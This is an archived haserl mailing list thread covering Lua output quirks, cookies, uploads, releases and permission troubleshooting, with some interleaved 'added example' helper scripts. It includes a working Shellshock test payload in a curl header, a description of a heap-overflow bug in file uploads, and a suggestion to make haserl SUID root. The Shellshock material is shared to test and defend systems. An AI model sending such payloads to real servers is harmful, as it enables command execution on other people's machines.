haserl-users Mailing List for Haserl
From: Ralph S. <ra...@ne...> - 2022-01-27 16:13:45
Hi Nico,

On Wed, Jan 26, 2022 at 11:12:06PM +0100, Nico de Haer wrote:
> Looks like lua itself is eating the newline.

Indeed, that seems to be what is happening. Afraid I do not know lua well enough to explain why it behaves that way. When using regular shell (eg. without --shell=lua) then the missing newline does appear.

Regards,
Ralph
From: Nico de H. <nic...@gm...> - 2022-01-26 22:12:24
Hi Ralph,

As you point out the EVAL translates to 'echo -n' and does not include a newline - this is what I expect and I think that is the way it should work. My point is... why is the newline after the <%= foo %> no longer there.

Looking at the output with the debug flag set:

~~~~~ code ~~~~~
io.write([=[content-type: text/plain

]=])
foo="bar"
io.write([=[
The value of foo is ]=])
io.write(tostring( foo ))
io.write([=[. Note that this in the middle of a line
Wat is the value of foo?
]=])
io.write(tostring( foo ))
io.write([=[
Hey, where did my newline go?
]=])
~~~~~~~~~~~~~~~

Looks like the io.write starts with a newline but that newline does not end up in the output.

I ran some extra tests using just lua and I found that these two bits of lua (Note the extra newline at the start of the 2nd io.write) give the same output:

~~~~~~~~~~~~~~~
io.write([=[This is a line
]=])
io.write([=[
This is a line
]=])
~~~~~~~~~~~~~~~

Looks like lua itself is eating the newline.

Regards,
Nico
From: Ralph S. <ra...@ne...> - 2022-01-26 21:08:51
Hi Nico,

On Wed, Jan 26, 2022 at 04:40:33PM +0100, Nico de Haer wrote:
> I expected to get three lines of output but I got two. Is this
> expected behavior?

I'm not the maintainer, just a user - but to me this is correct and therefore expected behaviour.

The man page indicates that the EVAL construct <%= expr %> is shorthand for "echo expr", but it actually expands to "echo -n expr". You can see this by adding the --debug flag when calling haserl. This will cause it to output all the shell statements, rather than executing them. I find this quite helpful when trying to figure out what it is doing.

In the case of using shell=lua, it looks like it expands to:

io.write(tostring( foo ))

without adding any newline, just like "echo -n". So it seems consistent at least.

Best regards,
-Ralph
From: Nico de H. <nic...@gm...> - 2022-01-26 15:40:55
Hi all,

The following haserl (version 0.9.36) / lua code does not create the results that I expected:

~~~~~ code ~~~~~
#!/usr/bin/haserl --shell=lua
content-type: text/plain

<% foo="bar" %>
The value of foo is <%= foo %>. Note that this in the middle of a line
What is the value of foo?
<%= foo %>
Hey, where did my newline go?
~~~~~~~~~~~~~~~

This results in the following output:

~~~~~ output ~~~~~
The value of foo is bar. Note that this in the middle of a line
What is the value of foo?
barHey, where did my newline go?
~~~~~~~~~~~~~~~

I expected to get three lines of output but I got two. Is this expected behavior?

Regards,
Nico
From: Ralph S. <ra...@ne...> - 2019-02-24 01:12:29
Hi Daniel,

> Hello, I start with shell and haserl. I am looking for three days to
> create a cookie shell without using javascript.
>
> If someone can help me by explaining how to do it, I will be happy to
> deepen my knowledge.

I'm not quite sure what you mean by "cookie shell". Can you explain?

In general, there are two parts to using cookies:
1) creating the cookie
2) retrieving the cookie in later requests

Regardless of which programming language you use, cookies are transferred the same way: as part of the HTTP protocol. I would recommend the Mozilla developer documentation as a good reference:
https://developer.mozilla.org/en-US/docs/Web/HTTP/Cookies

In a Haserl script, you create a cookie by including "Set-Cookie" in the HTTP headers. An example would be:

#!/usr/bin/haserl
Content-type: text/html
Set-Cookie: foo=bar

<html><body>
<h1>heading</h1>
</body></html>

Later on, in a subsequent request, you can obtain the value of the cookie using the variable $COOKIE_foo.

#!/usr/bin/haserl
Content-type: text/html

<html><body>
<p>Cookie value is <% echo $COOKIE_foo %>.</p>
</body></html>

Note that in both cases, the HTTP headers should really be using CR+LF line termination. See the section "RFC-2616 conformance" of the haserl manual at http://haserl.sourceforge.net/manpage.html for details.

Regards,
Ralph
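Ralph's reply shows the two halves (Set-Cookie in the headers, $COOKIE_foo on the next request) and notes the CR+LF requirement. The helpers below are an added example, not code from the thread or the haserl manual: they emit a CR+LF header block and refuse a cookie name or value that could not be a valid cookie, so a value taken from request data cannot smuggle an extra header line. The attribute defaults, the cookie_*_ok names and the SESSION_ID variable in the usage comment are this example's assumptions.

```sh
#!/bin/sh
# Added example, not from Ralph's reply or the haserl manual: helpers for
# writing the header block of a haserl script with CR+LF line ends (the
# "RFC-2616 conformance" point above) and a Set-Cookie header whose name
# and value are checked before anything is written. The attribute
# defaults (Path, HttpOnly, Secure, SameSite) are this example's choice.

# Returns 0 if $1 is non-empty and contains only RFC 6265 cookie-octets:
# printable ASCII minus space, double quote, comma, semicolon, backslash.
# CR and LF are therefore rejected as well, which is what blocks header
# injection. The count goes through wc so a value made only of newlines
# (which $() would strip) is still seen as "something left over".
cookie_value_ok() {
    [ -n "$1" ] || return 1
    case "$1" in
        *['"\;,']*) return 1 ;;   # separators RFC 6265 forbids in a value
    esac
    leftover=$(printf '%s' "$1" | LC_ALL=C tr -d '[:graph:]' | wc -c | tr -d ' ')
    [ "$leftover" -eq 0 ]
}

# Cookie names are HTTP tokens; this example allows a conservative subset.
cookie_name_ok() {
    case "$1" in
        '' | *[!A-Za-z0-9_-]*) return 1 ;;
        *) return 0 ;;
    esac
}

# Print one CR+LF terminated Set-Cookie line, or fail printing nothing.
set_cookie_header() {
    cookie_name_ok "$1" || return 1
    cookie_value_ok "$2" || return 1
    printf 'Set-Cookie: %s=%s; Path=/; HttpOnly; Secure; SameSite=Strict\r\n' "$1" "$2"
}

# Complete header block for an HTML page that sets cookie $1=$2.
# Validation happens before the first byte is written, so a bad value
# never produces a half-written header block.
http_headers() {
    cookie=$(set_cookie_header "$1" "$2") || return 1   # $() drops the LF; re-added below
    printf 'Content-type: text/html\r\n%s\n\r\n' "$cookie"
}

# In a haserl script, after sourcing this file, the first block would be:
#   <% http_headers session "$SESSION_ID" || exit 1 %>
# and a later request reads the value back as "$COOKIE_session".
```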
From: <dan...@la...> - 2019-02-23 17:46:11
Hello, I start with shell and haserl. I am looking for three days to create a cookie shell without using javascript.

If someone can help me by explaining how to do it, I will be happy to deepen my knowledge.

Thanks in advance. Excuse me for my bad English.
From: Daniel G. <gr...@su...> - 2015-03-30 22:36:17
I'm doing a new site with file uploading, and couldn't figure out why the uploaded files were disappearing. I'd been following through the manpage section on "Uploading a File", and took out the "<% rm -f $HASERL_uploadfile_path %>" so as to leave the uploaded file behind, but it was still disappearing. Then I read in another place in the manpage that the uploaded file is automatically deleted when the Haserl script ends.

This makes sense from a functional viewpoint, but the example strongly implies the exact opposite. Suggestion: change the manpage example to NOT explicitly delete the uploaded file, and change the "Don't worry, the file has just been deleted from the web server" text in the generated web page to "Don't worry, the file is automatically deleted once the script ends".

My $0.02,
Dan

Daniel T. Griscom, Suitable Systems
1 Centre Street, Suite 204, Wakefield, MA 01880-2400
(781) 665-0053 gr...@su... http://www.suitable.com/
From: Nathan A. <na...@us...> - 2015-02-16 00:15:35
Haserl 0.9.34 is now available.

* Haserl is now compatible with Lua 5.3 (in addition to 5.1 and 5.2)
* Back in July 2014 Victor Cook sent in a patch regarding processing headers in rfc2388.c. Basically there was a situation where the location of the CR/LF could cause unpredictable results with the processing of the rest of the message.

Apologies for taking so long, Victor!
From: Daniel G. <gr...@su...> - 2014-09-28 12:58:31
Thanks for the detailed response: it was really helpful. We're using thttpd. My own testing shows that there are a lot of hoops for the attacker to jump through, and he's flying blind (no output), but there's likely enough attack surface area for someone who can play with one of our boxes to be able to break into another one.
Thanks,
Dan
At 2:59 PM -0400 9/27/14, Nathan Angelacos wrote:
>Daniel,
>
>If you are really using bash, then unfortunately you are vulnerable.
>
>To test, use curl to add a bogus header:
>
>curl -H 'X-SHELLSHOCK: () { :; }; /usr/bin/touch /tmp/owned'
>http://example.com/haserl.cgi
>
>
>In my case, haserl.cgi is:
>
>#!/usr/bin/haserl --shell=/bin/bash
><%
>echo -e "Content-type: text/plain\r\n\r\n"
>
>env
>
>if [ -e /tmp/owned ]; then
> echo "vulnerable"
> rm /tmp/owned
>fi
>%>
>
>In my testing, the cgi segfaulted (mini_httpd) or returned a 500 error
>(lighttpd), but the /tmp/owned file was created - so that on subsequent
>requests (without the -H option) the last line of the cgi was "vulnerable".
>
>> Like many (most?) Haserl users, our company uses it to build embedded web CGIs by having it invoke a shell script using the default /bin/sh. /bin/sh, of course, is actually bash, which is in the news these days as the latest black hat vector.
>
>Debian and ubuntu use "dash" as the /bin/sh shell. I think its only
>user accounts that specifically get bash
>
>Run 'ls -l /bin/sh'
>
>to see what your systems use. That's why I had to explicitly specify
>the shell in the cgi. When I use the default /bin/sh on ubuntu, the
>attack fails.
--
Daniel T. Griscom gr...@su...
Suitable Systems http://www.suitable.com/
1 Centre Street, Suite 204 (781) 665-0053
Wakefield, MA 01880-2400
From: Nathan A. <na...@us...> - 2014-09-27 19:16:05
Daniel,
If you are really using bash, then unfortunately you are vulnerable.
To test, use curl to add a bogus header:
curl -H 'X-SHELLSHOCK: () { :; }; /usr/bin/touch /tmp/owned'
http://example.com/haserl.cgi
In my case, haserl.cgi is:
#!/usr/bin/haserl --shell=/bin/bash
<%
echo -e "Content-type: text/plain\r\n\r\n"
env
if [ -e /tmp/owned ]; then
  echo "vulnerable"
  rm /tmp/owned
fi
%>
In my testing, the cgi segfaulted (mini_httpd) or returned a 500 error
(lighttpd), but the /tmp/owned file was created - so that on subsequent
requests (without the -H option) the last line of the cgi was "vulnerable".
> Like many (most?) Haserl users, our company uses it to build embedded web CGIs by having it invoke a shell script using the default /bin/sh. /bin/sh, of course, is actually bash, which is in the news these days as the latest black hat vector.
Debian and ubuntu use "dash" as the /bin/sh shell. I think it's only
user accounts that specifically get bash.
Run 'ls -l /bin/sh'
to see what your systems use. That's why I had to explicitly specify
the shell in the cgi. When I use the default /bin/sh on ubuntu, the
attack fails.
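Nathan's curl test above is the attacker's side; the script below is an added example, not from the thread, covering the defender's checklist for the same issue: resolve what /bin/sh actually is (Nathan's `ls -l /bin/sh`), check whether that shell runs the trailing command of a function definition passed through the environment, and list the CGI scripts whose shebang asks haserl for bash regardless of what /bin/sh points to. The marker string, the function names and the *.cgi naming are assumptions of the example.

```sh
#!/bin/sh
# Added example (not Nathan's or Daniel's code). haserl runs its generated
# script under the shell named by --shell, or /bin/sh by default, so the
# questions are: (1) what is /bin/sh really on this host, (2) does that
# shell execute commands appended to a function definition found in the
# environment (the Shellshock bug), (3) which CGI scripts ask for bash
# explicitly. SHELLSHOCK_MARKER and the *.cgi naming are assumptions.

# Resolve symlinks so "/bin/sh" becomes e.g. /bin/dash, /bin/busybox or
# /bin/bash. Falls back to the given path if readlink -f is unavailable.
real_shell() {
    target=$(readlink -f "$1" 2>/dev/null) || target=$1
    printf '%s\n' "${target:-$1}"
}

# Returns 0 if shell $1 runs the command that follows a function
# definition stored in an environment variable. The definition is inert:
# an affected shell only prints the marker, nothing else happens.
shell_imports_env_functions() {
    out=$(env x='() { :;}; echo SHELLSHOCK_MARKER' "$1" -c 'echo probe' 2>/dev/null)
    case "$out" in
        *SHELLSHOCK_MARKER*) return 0 ;;
        *) return 1 ;;
    esac
}

# List *.cgi files under directory $1 whose shebang asks haserl for bash;
# those are exposed no matter what /bin/sh is.
scripts_requesting_bash() {
    grep -lE '^#!.*haserl.*--shell=(/bin/)?bash' "$1"/*.cgi 2>/dev/null
}

# Human-readable summary for one shell path; always returns 0.
shellshock_report() {
    target=$(real_shell "$1")
    printf '%s -> %s\n' "$1" "$target"
    if shell_imports_env_functions "$target"; then
        printf 'AFFECTED: %s runs commands from environment function definitions\n' "$target"
    else
        printf 'ok: %s does not run commands from environment function definitions\n' "$target"
    fi
    return 0
}

shellshock_report "${1:-/bin/sh}"
```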
From: Daniel G. <gr...@su...> - 2014-09-27 17:01:18
Like many (most?) Haserl users, our company uses it to build embedded web CGIs by having it invoke a shell script using the default /bin/sh. /bin/sh, of course, is actually bash, which is in the news these days as the latest black hat vector.

I understand that if I'd had my web server (thttpd) directly invoke a /bin/bash script then my site would be vulnerable to Shellshock. However, I'm not clear on what happens if thttpd invokes Haserl, which does its text processing and then invokes /bin/bash? Can the attack get through? Any idea how I'd test?

Thanks,
Dan

--
Daniel T. Griscom gr...@su...
Suitable Systems http://www.suitable.com/
1 Centre Street, Suite 204 (781) 665-0053
Wakefield, MA 01880-2400
From: Hinko K. <hin...@gm...> - 2014-06-17 11:59:01
Hi Nathan,

you are right. Newer version from official web page, 0.9.27, works as expected!

Thank you!
/Hinko

On 17 Jun 2014, at 13:39, Nathan Angelacos <na...@us...> wrote:
> Hinko,
>
> On 06/17/2014 02:49 AM, Hinko Kocevar wrote:
>> Hi,
>>
>> I tried haserl package from MAC ports (version 0.8.0) on Mac OS X Mavericks.
>
> Version 0.8.0 is very, very old. It does not support <% %> syntax, but used <? ?>
>
> The man page on the website is for the newer 0.9.x series.
>
> If at all possible, try to use the 0.9.33 version instead. If you must use 0.8.0, make sure you use the man page included in the 0.8.0 package. There's a lot missing in that version.
>
> HtH
From: Nathan A. <na...@us...> - 2014-06-17 11:39:46
Hinko,

On 06/17/2014 02:49 AM, Hinko Kocevar wrote:
> Hi,
>
> I tried haserl package from MAC ports (version 0.8.0) on Mac OS X Mavericks.

Version 0.8.0 is very, very old. It does not support <% %> syntax, but used <? ?>

The man page on the website is for the newer 0.9.x series.

If at all possible, try to use the 0.9.33 version instead. If you must use 0.8.0, make sure you use the man page included in the 0.8.0 package. There's a lot missing in that version.

HtH
From: Nathan A. <na...@us...> - 2014-06-13 17:08:53
Stephen Röttger reported a number of security bugs, the most serious of
which is a potential heap overflow in sliding_buffer.c (file uploads).
There is a potential for remote code execution.
At the same time, I've made an *experimental* change to make RESTful
APIs possible:
* PUT and DELETE methods are handled by the POST and GET handlers.
* For mostly historical reasons, data on the URI is still called
GET.<var>, and data in the body is named POST.<var>
* If the Content-Type is not "application/x-www-form-urlencoded", Haserl
won't try to urldecode the POST contents - it will just put the body in
POST.body verbatim.
For example:
curl -X PUT --header "Content-Type: application/json" -d '{ "foo": 1,
"bar": 3}' localhost://cgi-bin/x
will result in a lua variable:
POST.body={ "foo": 1, "bar": 3}
Again, this is experimental.
Thanks again to Stephen for the report!
Specifically the report was:
-------
>
> ==Medium==
> Heap overflow in sliding_buffer.c +130 (s_buffer_read)
>
> the length field will be negative if strlen(matchstr) is greater than the buffer or if read returned less than strlen(matchstr) bytes
> leads to: sbuf->ptr < sbuf->buf (the current pointer points to an address before the buffer’s beginning)
> line 91: will result in a wrong length calculation bigger than the buffer itself
> line 94: memmove heap overflow which might lead to remote code execution
> If this bug can be triggered depends on the web server configuration:
> if the attacker can control number of bytes returned by read (e.g. if the socket is passed to haserl)
> if the web server accepts HTTP headers bigger than 128kb (this should be possible in lighttpd, if the tcp window size is >= 64kb)
>
> ==Low==
> rfc2388.c +462 (rfc2388_handler)
>
> free called on uninitialized variable
>
> common.c +249 (buffer_add)
>
> potential integer overflow leading to out of bounds memcpy
> exploitation improbable, since memcpy will segfault on a big size value
>
> common.c +258 (buffer_add)
>
> missing check for return value of realloc
> consecutive write to NULL+user controlled offset
> user controlled offset probably not big enough to point to mapped memory
>
> rfc2388.c +139 & +148 (mime_tag_add)
>
> missing NULL checks for return value of strchr for closing quotes
> could lead to information disclosure, but improbable
> if str pointer is > INT_MAX
> will malloc (-1 * (int) str) bytes and memcpy from str
From: Ralph S. <ra...@ne...> - 2014-03-20 19:58:14
On Thu, Mar 20, 2014 at 08:30:51PM +0100, Peter Korsgaard wrote:
> > For many systems, when the shell is bash, and both echo/printf
> > are built-ins, there is likely not much difference. However,
> > I am running haserl on an embedded system using 'ash' shell
> > (from busybox). It has an option to make 'echo' a builtin, and
> > I have that enabled, but there is no builtin version of printf.
>
> But ash does have an option for printf as a builtin:
>
> grep ASH_BUILTIN_ shell/Config.in
> config ASH_BUILTIN_ECHO
> config ASH_BUILTIN_PRINTF
> config ASH_BUILTIN_TEST

Hi Peter,

Thanks, you are right. I am using an old version of ash, from busybox-1.2.1 (yes, 20 versions behind...), which lacks this option. I shall have to look at updating "the whole world"...

-Ralph
From: Peter K. <pe...@ko...> - 2014-03-20 19:31:01
>>>>> "Ralph" == Ralph Siemsen <ra...@ne...> writes:

> Hi Nathan et al,

> I recently upgraded to 0.9.32 and found a fairly significant
> performance regression. I've traced it down to a change done
> in 0.9.28 when 'echo' was replaced with 'printf' in the
> generated shell script.

> For many systems, when the shell is bash, and both echo/printf
> are built-ins, there is likely not much difference. However,
> I am running haserl on an embedded system using 'ash' shell
> (from busybox). It has an option to make 'echo' a builtin, and
> I have that enabled, but there is no builtin version of printf.

But ash does have an option for printf as a builtin:

grep ASH_BUILTIN_ shell/Config.in
config ASH_BUILTIN_ECHO
config ASH_BUILTIN_PRINTF
config ASH_BUILTIN_TEST

--
Bye, Peter Korsgaard
From: Ralph S. <ra...@ne...> - 2014-03-20 18:50:49
Hi Nathan et al,

I recently upgraded to 0.9.32 and found a fairly significant performance regression. I've traced it down to a change done in 0.9.28 when 'echo' was replaced with 'printf' in the generated shell script.

For many systems, when the shell is bash, and both echo/printf are built-ins, there is likely not much difference. However, I am running haserl on an embedded system using 'ash' shell (from busybox). It has an option to make 'echo' a builtin, and I have that enabled, but there is no builtin version of printf. Consequently, a script that used to execute in 0.25sec now takes over 4 seconds to execute. Almost all of the script is verbatim text that just gets echoed.

Given that haserl seems targeted towards small embedded systems, perhaps the decision to switch from echo to printf might warrant some additional discussion?

Regards,
-Ralph
From: Angelo D. <ang...@gm...> - 2014-03-07 17:26:59
On 07/03/2014 16:07, Nathan Angelacos wrote:
> Alternatively, you could try this (at least to test)
>
> If you make haserl as suid root:
>
> chown root:root /usr/bin/haserl
> chmod 4111 /usr/bin/haserl
> chown root:root /var/www/myscript
>
> Then haserl will run the script with the permissions of the owner /of
> the script/. You won't need the sudo in the script then - you'll
> already be running as root.
>
> You'll need to be /very careful/ to make sure all your other scripts are
> owned by www-data though!

Ok, I solved it: sudo-enabled commands in sudoers also need to have their parameters enabled there. I actually need

Cmnd_Alias SYSTEM = /bin/kill -k *, other commands ...

What do you suggest for all the commands I have to issue from www-data (cgi)? For now I am using this sudo way, but I don't know if it is a good way to go. Better maybe enable some scripts instead of commands?

Thanks
angelo
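Angelo asks whether to allow scripts rather than commands; the script below is an added example, not from the thread, of that approach: a fixed-purpose wrapper that sudoers grants to www-data without a wildcard and without making anything SUID. It takes a service name, never a pid, and validates the name, the pidfile contents and the process state before signalling. The sudoers line, the /run/<name>.pid layout and the stop-service name are assumptions of the example.

```sh
#!/bin/sh
# Added example (not from the thread): a single-purpose wrapper that a
# sudoers rule can grant to www-data, instead of a wildcard such as
# "/bin/kill -9 *", which would let the CGI user kill any process.
# Assumed, hypothetical sudoers line:
#   www-data ALL=(root) NOPASSWD: /usr/local/sbin/stop-service
# Assumed layout: each service writes its pid to $PIDFILE_DIR/<name>.pid.
# The wrapper never takes a pid from its caller, only a service name.

PIDFILE_DIR=${PIDFILE_DIR:-/run}

# Service names are restricted to a safe character set, so the argument
# cannot select a pidfile outside PIDFILE_DIR ("../etc/..." and the like).
valid_service_name() {
    case "$1" in
        '' | *[!A-Za-z0-9_-]*) return 1 ;;
        *) return 0 ;;
    esac
}

# True if pid $1 exists and is not a zombie (kill -0 alone says "yes"
# for zombies, which would make the wait loop below spin).
process_alive() {
    kill -0 "$1" 2>/dev/null || return 1
    if [ -r "/proc/$1/stat" ]; then
        state=$(sed 's/^.*) //' "/proc/$1/stat" 2>/dev/null | cut -d' ' -f1)
        [ "$state" != "Z" ] || return 1
    fi
    return 0
}

# Print the pid recorded for service $1 after validating it: a positive
# integer, never pid 1, and currently alive. Anything else is rejected.
pid_from_pidfile() {
    pidfile="$PIDFILE_DIR/$1.pid"
    [ -f "$pidfile" ] || return 1
    pid=$(head -n 1 "$pidfile") || return 1
    case "$pid" in
        '' | *[!0-9]*) return 1 ;;
    esac
    [ "$pid" -gt 1 ] || return 1
    process_alive "$pid" || return 1
    printf '%s\n' "$pid"
}

# Stop one named service: SIGTERM, wait up to ~2 s, then SIGKILL.
# Return codes: 0 stopped, 2 bad name, 3 no usable pid, 4 signal failed.
stop_service() {
    valid_service_name "$1" || { echo "stop-service: bad service name" >&2; return 2; }
    pid=$(pid_from_pidfile "$1") || { echo "stop-service: no live pid for $1" >&2; return 3; }
    kill -TERM "$pid" 2>/dev/null || return 4
    i=0
    while process_alive "$pid" && [ "$i" -lt 20 ]; do
        sleep 0.1
        i=$((i + 1))
    done
    if process_alive "$pid"; then
        kill -KILL "$pid" 2>/dev/null || return 4
    fi
    return 0
}

# Invoked via sudo as: stop-service <name>
if [ $# -eq 1 ]; then
    stop_service "$1"
fi
```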
From: Nathan A. <na...@us...> - 2014-03-07 15:23:02
Alternatively, you could try this (at least to test)

If you make haserl as suid root:

chown root:root /usr/bin/haserl
chmod 4111 /usr/bin/haserl
chown root:root /var/www/myscript

Then haserl will run the script with the permissions of the owner /of the script/. You won't need the sudo in the script then - you'll already be running as root.

You'll need to be /very careful/ to make sure all your other scripts are owned by www-data though!
From: Daniel G. <gr...@su...> - 2014-03-07 15:01:28
At 3:56 PM +0100 3/7/14, Angelo Dureghello wrote:
> Dear Daniel and all,
>
> On 07/03/2014 11:50, Daniel Griscom wrote:
>> Some more tips:
>>
>> - Do you really have the commands quoted by backticks? I'm guessing
>> it would work, but it could also be causing problems.
>>
>> - I didn't mean to echo the output of the sudo (although that might
>> have been useful), but the result or return value. Try
>>
>> echo "sudo result is $?"
>>
>> right after the sudo command
>
> Done,
> i get
> id is : uid=33(www-data) gid=33(www-data)
> groups=29(audio),33(www-data),38(led)
>
> sudo result is 1

non-zero means it failed.

>> - You can run haserl scripts from the command line and watch the
>> output, so you don't have to involve the web server. (The results in
>> this case might be different, but it might be helpful.)
> already tested, if i su www-data, then call /usr/bin/haserl with same
> script, kill works perfect.
>
> Issue seems strangely only related when lighttpd is involved.

No, it's surely some sort of permissions issue, which depends exactly on who's doing the executing. Solve that and you're done, but until then, not.

Dan

>> cat output
>>>
>>> `sudo /usr/kill -9 1593 > output`
>>>
>>> echo "result is "
>>> cat output
>>>
>>> %>
>>>
>>> I get:
>>>
>>> id is : uid=33(www-data) gid=33(www-data)
>>> groups=29(audio),33(www-data),38(led)
>>> result is
>>>
>>> Empty, kill silently fails. Strange thing is that if i su to www-data on
>>> the console, pass the same command "sudo /usr/kill -9 1593" to haserl
>>> wrapper,
>>> i have the process correctly killed.
>>>
>>>> At 6:51 PM +0100 3/6/14, Angelo Dureghello wrote:
>>>>> Dear,
>>>>>
>>>>> i am working on an embedded linux, arm based board, and using very
>>>>> nice haserl tool.
>>>>>
>>>>> I am trying to issue a "kill -9" from a .cgi passed to haser_wrapper.
>>>>>
>>>>> this is the script of the "test.cgi" :
>>>>>
>>>>> <% . /usr/local/lib/cgi/generic.sh; print_http_hdr %>
>>>>> <%
>>>>> echo test kill
>>>>>
>>>>> sudo /usr/kill -9 1593
>>>>> %>
>>>>>
>>>>> If i work on console and pass the file to haserl_wrapper, it works,
>>>>> the process is killed properly.
>>>>> From web (using actually lighttpd), echo is redirected as web output
>>>>> and kill doesn't work.
>>>>>
>>>>> Every help is really appreciated.
>>>>>
>>>>> Thanks,
>>>>> Angelo

--
Daniel T. Griscom gr...@su...
Suitable Systems http://www.suitable.com/
1 Centre Street, Suite 204 (781) 665-0053
Wakefield, MA 01880-2400
From: Angelo D. <ang...@gm...> - 2014-03-07 14:56:31
Dear Daniel and all,

On 07/03/2014 11:50, Daniel Griscom wrote:
> Some more tips:
>
> - Do you really have the commands quoted by backticks? I'm guessing
> it would work, but it could also be causing problems.
>
> - I didn't mean to echo the output of the sudo (although that might
> have been useful), but the result or return value. Try
>
> echo "sudo result is $?"
>
> right after the sudo command

Done, I get

id is : uid=33(www-data) gid=33(www-data) groups=29(audio),33(www-data),38(led)
sudo result is 1

> - You can run haserl scripts from the command line and watch the
> output, so you don't have to involve the web server. (The results in
> this case might be different, but it might be helpful.)

Already tested: if I su to www-data, then call /usr/bin/haserl with the same script, kill works perfectly.

The issue seems strangely only related to when lighttpd is involved.

> Dan
>
> At 9:59 AM +0100 3/7/14, Angelo Dureghello wrote:
>> Hello,
>>
>> thanks for the support
>>
>> On 06/03/2014 19:04, Daniel Griscom wrote:
>>> I doubt your web server executes scripts with the permissions
>>> necessary to run sudo without a password (I certainly hope not).
>>>
>>> In any case, I'd put in some test echo statements that give the ID of
>>> the process when the script is executed, and perhaps echoed the
>>> return value of the sudo (i.e. did it fail?).
>>>
>>> You might want to make an external script (kept OUTSIDE of the web
>>> tree) that is SUID root and does what you need it to. Then have this
>>> script execute the SUID one. Even that's a bit iffy in the security
>>> department, though.
>>>
>>> Dan
>>
>> Dear Dan,
>>
>> thanks, i am still stuck on this,
>>
>> i have set sudo to allow only certain commands to www-data for now, i
>> can also allow a single script only, no problem for that.
>>
>> Well i have several .sh scripts executed through lighttpd/haserl, it is
>> strange, several other commands, also with sudo, are executed fine.
>>
>> Now i tried:
>>
>> <% . /usr/local/lib/cgi/generic.sh; print_http_hdr %>
>> <%
>>
>> `id > output`
>>
>> echo "id is : "
>> cat output
>>
>> `sudo /usr/kill -9 1593 > output`
>>
>> echo "result is "
>> cat output
>>
>> %>
>>
>> I get:
>>
>> id is : uid=33(www-data) gid=33(www-data)
>> groups=29(audio),33(www-data),38(led)
>> result is
>>
>> Empty, kill silently fails. Strange thing is that if i su to www-data on
>> the console, pass the same command "sudo /usr/kill -9 1593" to haserl
>> wrapper, i have the process correctly killed.
>>
>>> At 6:51 PM +0100 3/6/14, Angelo Dureghello wrote:
>>>> Dear,
>>>>
>>>> i am working on an embedded linux, arm based board, and using very
>>>> nice haserl tool.
>>>>
>>>> I am trying to issue a "kill -9" from a .cgi passed to haser_wrapper.
>>>>
>>>> this is the script of the "test.cgi" :
>>>>
>>>> <% . /usr/local/lib/cgi/generic.sh; print_http_hdr %>
>>>> <%
>>>> echo test kill
>>>>
>>>> sudo /usr/kill -9 1593
>>>> %>
>>>>
>>>> If i work on console and pass the file to haserl_wrapper, it works,
>>>> the process is killed properly.
>>>> From web (using actually lighttpd), echo is redirected as web output
>>>> and kill doesn't work.
>>>>
>>>> Every help is really appreciated.
>>>>
>>>> Thanks,
>>>> Angelo
From: Daniel G. <gr...@su...> - 2014-03-07 11:51:33
|
Some more tips:

- Do you really have the commands quoted by backticks? I'm guessing it would work, but it could also be causing problems.
- I didn't mean to echo the output of the sudo (although that might have been useful), but the result or return value. Try echo "sudo result is $?" right after the sudo command.
- You can run haserl scripts from the command line and watch the output, so you don't have to involve the web server. (The results in this case might be different, but it might be helpful.)

Dan

At 9:59 AM +0100 3/7/14, Angelo Dureghello wrote:
>Hello,
>
>thanks for the support
>
>On 06/03/2014 19:04, Daniel Griscom wrote:
>> I doubt your web server executes scripts with the permissions
>> necessary to run sudo without a password (I certainly hope not).
>>
>> In any case, I'd put in some test echo statements that give the ID of
>> the process when the script is executed, and perhaps echo the
>> return value of the sudo (i.e. did it fail?).
>>
>> You might want to make an external script (kept OUTSIDE of the web
>> tree) that is SUID root and does what you need it to. Then have this
>> script execute the SUID one. Even that's a bit iffy in the security
>> department, though.
>>
>>
>> Dan
>
>Dear Dan,
>
>thanks, I am still stuck on this.
>
>I have set sudo to allow only certain commands for www-data for now; I
>can also allow a single script only, no problem with that.
>
>Well, I have several .sh scripts executed through lighttpd/haserl. It is
>strange: several other commands, also with sudo, are executed fine.
>
>Now I tried:
>
><% . /usr/local/lib/cgi/generic.sh; print_http_hdr %>
><%
>
>`id > output`
>
>echo "id is : "
>cat output
>
>`sudo /usr/kill -9 1593 > output`
>
>echo "result is "
>cat output
>
>%>
>
>
>I get:
>
>id is : uid=33(www-data) gid=33(www-data)
>groups=29(audio),33(www-data),38(led)
>result is
>
>
>Empty, kill silently fails.
>Strange thing is that if I su to www-data on
>the console and pass the same command "sudo /usr/kill -9 1593" to the haserl
>wrapper, I have the process correctly killed.
>
>>
>> At 6:51 PM +0100 3/6/14, Angelo Dureghello wrote:
>>> Dear,
>>>
>>> I am working on an embedded Linux, ARM-based board, and using the very
>>> nice haserl tool.
>>>
>>> I am trying to issue a "kill -9" from a .cgi passed to haserl_wrapper.
>>>
>>> This is the script of the "test.cgi":
>>>
>>> <% . /usr/local/lib/cgi/generic.sh; print_http_hdr %>
>>> <%
>>> echo test kill
>>>
>>> sudo /usr/kill -9 1593
>>> %>
>>>
>>>
>>> If I work on the console and pass the file to haserl_wrapper, it works,
>>> the process is killed properly.
>>> From the web (actually using lighttpd), echo is redirected as web output
>>> and kill doesn't work.
>>>
>>> Any help is really appreciated.
>>>
>>> Thanks,
>>> Angelo
>>>
>>>
>>> ------------------------------------------------------------------------------
>>> Subversion Kills Productivity. Get off Subversion & Make the Move to Perforce.
>>> With Perforce, you get hassle-free workflows. Merge that actually works.
>>> Faster operations. Version large binaries. Built-in WAN optimization and the
>>> freedom to use Git, Perforce or both. Make the move to Perforce.
>>> http://pubads.g.doubleclick.net/gampad/clk?id=122218951&iu=/4140/ostg.clktrk
>>> _______________________________________________
>>> Haserl-users mailing list
>>> Has...@li...
>>> https://lists.sourceforge.net/lists/listinfo/haserl-users
>>

-- 
Daniel T. Griscom                             gr...@su...
Suitable Systems                      http://www.suitable.com/
1 Centre Street, Suite 204                    (781) 665-0053
Wakefield, MA  01880-2400
From: Angelo D. <ang...@gm...> - 2014-03-07 08:59:46
Hello,

thanks for the support

On 06/03/2014 19:04, Daniel Griscom wrote:
> I doubt your web server executes scripts with the permissions
> necessary to run sudo without a password (I certainly hope not).
>
> In any case, I'd put in some test echo statements that give the ID of
> the process when the script is executed, and perhaps echo the
> return value of the sudo (i.e. did it fail?).
>
> You might want to make an external script (kept OUTSIDE of the web
> tree) that is SUID root and does what you need it to. Then have this
> script execute the SUID one. Even that's a bit iffy in the security
> department, though.
>
>
> Dan

Dear Dan,

thanks, I am still stuck on this.

I have set sudo to allow only certain commands for www-data for now; I
can also allow a single script only, no problem with that.

